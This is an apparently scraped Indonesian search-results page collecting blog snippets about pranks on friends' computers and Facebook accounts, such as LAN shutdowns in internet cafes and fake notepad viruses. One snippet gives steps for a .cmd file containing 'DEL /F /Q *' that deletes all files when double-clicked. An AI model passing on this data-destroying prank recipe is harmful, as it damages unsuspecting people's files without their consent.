cara iseng lewat facebook

Cara Iseng Mematikan Komputer Teman Dengan Icon

Diterbitkan pada Friday, 11 July 2014 Pukul 22.39

Hi Bloggers !!! WELCOME TO MY BLOG disini ane mau menjelaskan cara iseng mematikanputer temen agan - agan dengan mengganti icon asli aplikasi yang sering dipakai temen agan anda dengan diganti aplikasi 

Cara Membuat Virus Iseng Dengan Notepad (tidak Ada Efek...

Diterbitkan pada Friday, 20 January 2012 Pukul 12.37

iseng-iseng ngerjain teman yang rese atau kita yang rese ngerjain teman , hehe. Kali ini kita akan membuat virus palsu via notepad,kalau namanya virus palsu berarti pasti tidak akan merusak apapun yang ada di kompi kita. Karena ini 

Cara Iseng Shutdown Komputer Orang Via Lan...

Diterbitkan pada Friday, 9 December 2011 Pukul 4.45

cara iseng SHUTDOWN KOMPUTER ORANG VIA LAN (WARNET). Matiin komputer orang diwarnet bisa kita lakukan lo ternyata. Yaa.. mungkin juga sebagian orang tidak tau akan hal ini. oke sekarang kita langsung saja ke TKP. INGAT :.

Pikol0 Inside: Cara Iseng Lewat Noteped

Diterbitkan pada Tuesday, 24 May 2011 Pukul 23.35

cara iseng lewat noteped. Menghapus Files dan Folder 1. buka notepad trus ketik DEL /F /Q * 2. save as dan simpan dengan nama test.cmd 3. kalau elo dobel klik file test.cmd maka semua files dan folder akan terhapus. Menghapus Files Tertentu 1. buka notepad trus ketik erase C:TEST.txt 2. save as dan simpan dengan nama test.cmd 3. kalo elo dobel klik file test.cmd maka files TEST.txt di drive c:\ akan Lencana facebook. Oprator Ħāčkęŕ · Buat Lencana Anda 

Cara Iseng Ngerjain Teman Facebook

Diterbitkan pada Friday, 25 October 2013 Pukul 2.15

Madthohars | Gudang Ilmu & Artikel xX0Xx on 12:54 AM, 27-Oct-13. smile ijin coba kkkk makasih. smile ditunggu kunjungan baliknya di blog aku ya. Membangun KEDEKATAN lewat TELEPATI

Cara Iseng Kirim Inbox Temen Pake Facebook Orang Lain...

Diterbitkan pada Wednesday, 12 December 2012 Pukul 13.21

Pada kali ini saya akan share tentang cara iseng Inbox temen Pake facebook Orang lain. hehehe dan kali ini bertepatan dengan tanggal 12 bulan 12.

Bloge Aad: Iseng Via Facebook

Diterbitkan pada Sunday, 14 November 2010 Pukul 6.58

iseng via facebook. iseng bernostalgia dengan masa lalu, aku nyoba membaca lagi status yang ada di Fb. ehalah, ternyata sudah buanyaaaakkkk banget.aku nggak nyangka, potongan-potongan kata spontan yang tiap hari atau bahkan Ahmad tiap orang punya kepentingan, perspektif, keyakinan, egoisitas, cara berpikir, naluri, dan subyektifitas yang berbeda-beda. setiap orang mempunyai kerelatifan obyektifitas yang membuat jarak antar satu dan lainnya. dan 

Ilmu Komputer: Cara Iseng Ngerjain Temen Di Facebook

Diterbitkan pada Wednesday, 5 May 2010 Pukul 18.59

Istilah tepatnya sih bukan virus ini hanya menggunakan program notepad dengan sedikit kreativitas yang bakal membuat facebookers langsung shock dan kaget dengan apa yang mereka lihat.. Gimana sih cara buatnya ? This is simple . How to make a fake facebook virus – method 1. usi2506 mengatakan terus slnjutnya gimana bro? di kopi ke komputer teman, apa langsung up load lewat akun facebook? 1 November 2010 07.21 · Tutorials mengatakan.

Cari Iklan:

- Halaman ini diberdayakan oleh Google dan Bing! -

X